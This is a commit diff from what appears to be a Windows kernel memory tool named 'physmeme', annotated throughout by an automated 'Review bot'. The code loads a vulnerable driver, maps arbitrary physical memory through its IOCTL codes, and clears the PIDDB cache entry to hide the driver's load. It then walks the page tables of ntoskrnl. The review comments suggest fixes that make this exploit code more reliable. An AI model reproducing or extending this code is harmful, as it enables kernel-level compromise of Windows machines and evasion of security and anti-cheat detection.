removed junk code

merge-requests/1/merge
xerox 4 years ago
parent 5941251f67
commit 95be5d6e6e

@ -4,22 +4,40 @@
int __cdecl main(int argc, char** argv) int __cdecl main(int argc, char** argv)
{ {
nasa::load_drv(); if (!nasa::load_drv())
{
std::printf("[!] unable to load vulnerable driver... run as admin?\n");
return -1;
}
nasa::kernel_ctx kernel; nasa::kernel_ctx kernel;
std::printf("[+] %s mapped physical page -> 0x%p\n", nasa::syscall_hook.first.data(), nasa::psyscall_func.load());
std::printf("[+] %s page offset -> 0x%x\n", nasa::syscall_hook.first.data(), nasa::nt_page_offset);
// clear piddb cache table entry for vulnerable driver...
if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp)) if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp))
std::cout << "[+] Removed PIDDB Cache entry for physmeme driver..." << std::endl; std::printf("[+] Removed PIDDB Cache entry for physmeme driver...\n");
nasa::unload_drv(); else
std::printf("[!] unable to clear PIDDB Cache entry for vulnerable driver...\n");
if (!nasa::unload_drv())
{
std::printf("[!] unable to unload vulnerable driver... close all handles?\n");
return -1;
}
const std::pair<unsigned, virt_addr_t> my_proc_data = { GetCurrentProcessId(),
virt_addr_t{ reinterpret_cast<void*>(util::get_kernel_module_base("ntoskrnl.exe")) } };
const std::pair<unsigned, virt_addr_t> my_proc_data = { GetCurrentProcessId(), virt_addr_t{ GetModuleHandle(NULL) } };
std::cout << "[+] my pid: " << std::hex << my_proc_data.first << std::endl; std::cout << "[+] my pid: " << std::hex << my_proc_data.first << std::endl;
std::cout << "[+] my base: " << std::showbase << std::hex << my_proc_data.second.value << std::endl; std::cout << "[+] kernel base: " << std::showbase << std::hex << my_proc_data.second.value << std::endl;
nasa::mem_ctx my_proc(kernel, my_proc_data.first); nasa::mem_ctx my_proc(kernel, my_proc_data.first);
const auto module_base = my_proc_data.second; const auto ntoskrnl_pde = my_proc.get_pde(my_proc_data.second.value);
std::cout << "[+] base address pml4e: " << std::hex << my_proc[module_base.pml4_index].value << std::endl; // ntoskrnl is allocated in 2mb large pages :)
std::cout << "[+] base address pdpte: " << std::hex << my_proc[{module_base.pml4_index, module_base.pdpt_index}].value << std::endl; std::printf("[+] page present -> %d\n", ntoskrnl_pde.second.present);
std::cout << "[+] base address pde: " << std::hex << my_proc[{module_base.pml4_index, module_base.pdpt_index, module_base.pd_index}].value << std::endl; std::printf("[+] page frame number -> 0x%x\n", ntoskrnl_pde.second.pfn);
std::cout << "[+] base address pte: " << std::hex << my_proc[{module_base.pml4_index, module_base.pdpt_index, module_base.pd_index, module_base.pt_index}].value << std::endl; std::printf("[+] large page -> %d\n", ntoskrnl_pde.second.page_size);
std::cin.get(); std::cin.get();
} }
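Review bot: The ntoskrnl base returned by `util::get_kernel_module_base("ntoskrnl.exe")` is never checked, so a zero result is printed as `kernel base: 0` and then fed straight into `my_proc.get_pde`; guard it right after `my_proc_data` is built: `if (!my_proc_data.second.value) { std::printf("[!] unable to locate ntoskrnl.exe base\n"); return -1; }`. The `0x%x` conversion for `ntoskrnl_pde.second.pfn` is also suspect: a PDE's page-frame field is wider than 32 bits, and if `pfn` is declared as a 64-bit bit-field it is passed to printf as a 64-bit argument that `%x` only half-consumes, so `0x%llx` with `static_cast<unsigned long long>(ntoskrnl_pde.second.pfn)` is the safe form. Note too that when `unload_drv()` fails the program exits while the vulnerable driver presumably remains loaded and usable by anyone on the box; a comment stating that the operator must clean it up manually, or a retry, would make that consequence explicit.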

@ -214,7 +214,7 @@ namespace nasa
return {}; return {};
pt_entries entries; pt_entries entries;
if (use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)) if ((use_hyperspace ? hyperspace_entries(entries, addr) : virt_to_phys(entries, addr)))
return { entries.pt.first, entries.pt.second }; return { entries.pt.first, entries.pt.second };
return {}; return {};
} }
@ -236,7 +236,7 @@ namespace nasa
return {}; return {};
pt_entries entries; pt_entries entries;
if (use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)) if ((use_hyperspace ? hyperspace_entries(entries, addr) : virt_to_phys(entries, addr)))
return { entries.pd.first, entries.pd.second }; return { entries.pd.first, entries.pd.second };
return {}; return {};
} }
@ -258,7 +258,7 @@ namespace nasa
return {}; return {};
pt_entries entries; pt_entries entries;
if (use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)) if ((use_hyperspace ? hyperspace_entries(entries, addr) : virt_to_phys(entries, addr)))
return { entries.pdpt.first, entries.pdpt.second }; return { entries.pdpt.first, entries.pdpt.second };
return {}; return {};
} }
@ -280,7 +280,7 @@ namespace nasa
return {}; return {};
pt_entries entries; pt_entries entries;
if (use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)) if ((use_hyperspace ? hyperspace_entries(entries, addr) : virt_to_phys(entries, addr)))
return { entries.pml4.first, entries.pml4.second }; return { entries.pml4.first, entries.pml4.second };
return {}; return {};
} }
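Review bot: The new condition `if ((use_hyperspace ? hyperspace_entries(entries, addr) : virt_to_phys(entries, addr)))` is wrapped in doubled parentheses, which is the idiom used to silence assignment-in-condition warnings and suggests an assignment where there is none; one pair is enough. Dropping the `(bool)` cast also means the ternary now yields the common type of its two branches, so if `virt_to_phys` returns something other than `bool` the conversion to the condition happens implicitly — `!= 0` would keep the intent readable. The same lookup is repeated verbatim in all four accessors (pte, pde, pdpt, pml4); a private helper along the lines of `bool resolve_entries(pt_entries& entries, const auto& addr) const { return use_hyperspace ? hyperspace_entries(entries, addr) : virt_to_phys(entries, addr); }` would reduce each to a single `return`. Each accessor's signature and its preceding early-return guard lie outside the hunk.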

@ -8,6 +8,9 @@
#include "../loadup.hpp" #include "../loadup.hpp"
#include "../raw_driver.hpp" #include "../raw_driver.hpp"
#define MAP_PHYSICAL_MEMORY 0xC3502004
#define UNMAP_PHYSICAL_MEMORY 0xC3502008
#pragma pack ( push, 1 ) #pragma pack ( push, 1 )
typedef struct _GIOMAP typedef struct _GIOMAP
{ {
@ -23,7 +26,6 @@ namespace nasa
{ {
inline std::string drv_key; inline std::string drv_key;
inline HANDLE drv_handle = NULL; inline HANDLE drv_handle = NULL;
inline std::vector<std::pair<std::uintptr_t, std::uint32_t >> virtual_mappings;
inline bool load_drv() inline bool load_drv()
{ {
@ -51,38 +53,43 @@ namespace nasa
return CloseHandle(drv_handle) && driver::unload(drv_key); return CloseHandle(drv_handle) && driver::unload(drv_key);
} }
inline std::uintptr_t map_phys( inline std::uintptr_t map_phys(std::uintptr_t addr, std::size_t size)
std::uintptr_t addr,
std::size_t size
)
{ {
GIOMAP in_buffer = { 0, 0, addr, 0, size }; GIOMAP in_buffer = { 0, 0, addr, 0, size };
uintptr_t out_buffer[2] = { 0 }; uintptr_t out_buffer[2] = { 0 };
unsigned long returned = 0; unsigned long returned = 0;
DeviceIoControl(drv_handle, 0xC3502004, reinterpret_cast<LPVOID>(&in_buffer), sizeof(in_buffer),
reinterpret_cast<LPVOID>(out_buffer), sizeof(out_buffer), &returned, NULL);
virtual_mappings.push_back({ out_buffer[0], size }); if (!DeviceIoControl(
drv_handle,
MAP_PHYSICAL_MEMORY,
reinterpret_cast<LPVOID>(&in_buffer),
sizeof(in_buffer),
reinterpret_cast<LPVOID>(out_buffer),
sizeof(out_buffer),
&returned, NULL
))
return NULL;
return out_buffer[0]; return out_buffer[0];
} }
inline bool unmap_phys( inline bool unmap_phys(std::uintptr_t addr, std::size_t size)
std::uintptr_t addr,
std::size_t size
)
{ {
uintptr_t in_buffer = addr; uintptr_t in_buffer = addr;
uintptr_t out_buffer[2] = { sizeof(out_buffer) }; uintptr_t out_buffer[2] = { sizeof(out_buffer) };
unsigned long returned = NULL; unsigned long returned = NULL;
DeviceIoControl(drv_handle, 0xC3502008, reinterpret_cast<LPVOID>(&in_buffer), sizeof(in_buffer),
reinterpret_cast<LPVOID>(out_buffer), sizeof(out_buffer), &returned, NULL);
return out_buffer[0];
}
inline void unmap_all() if (!DeviceIoControl(
{ drv_handle,
for (auto idx = 0u; idx < virtual_mappings.size(); ++idx) UNMAP_PHYSICAL_MEMORY,
unmap_phys(virtual_mappings[idx].first, virtual_mappings[idx].second); reinterpret_cast<LPVOID>(&in_buffer),
sizeof(in_buffer),
reinterpret_cast<LPVOID>(out_buffer),
sizeof(out_buffer),
&returned, NULL
))
return false;
return out_buffer[0];
} }
} }
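Review bot: In `map_phys` a successful `DeviceIoControl` is taken as proof that `out_buffer[0]` holds a mapping address, but `returned` is filled and never consulted, so a request completed with fewer output bytes returns whatever stale or zero value sits in the buffer; check the length: `if (!DeviceIoControl(drv_handle, MAP_PHYSICAL_MEMORY, ..., &returned, NULL) || returned < sizeof(out_buffer[0])) return 0;` and apply the same test in `unmap_phys` before `return out_buffer[0];`. `return NULL;` from a function returning `std::uintptr_t`, and `unsigned long returned = NULL;`, use a pointer macro for an integer — plain `0` says what is meant. The `size` parameter of `unmap_phys` is not read anywhere in its body now that the mapping list is gone, so either forward it to the driver request or document that it is ignored. The two IOCTL codes would be better as `inline constexpr DWORD` values inside the `nasa` namespace than as unscoped `#define`s in a header.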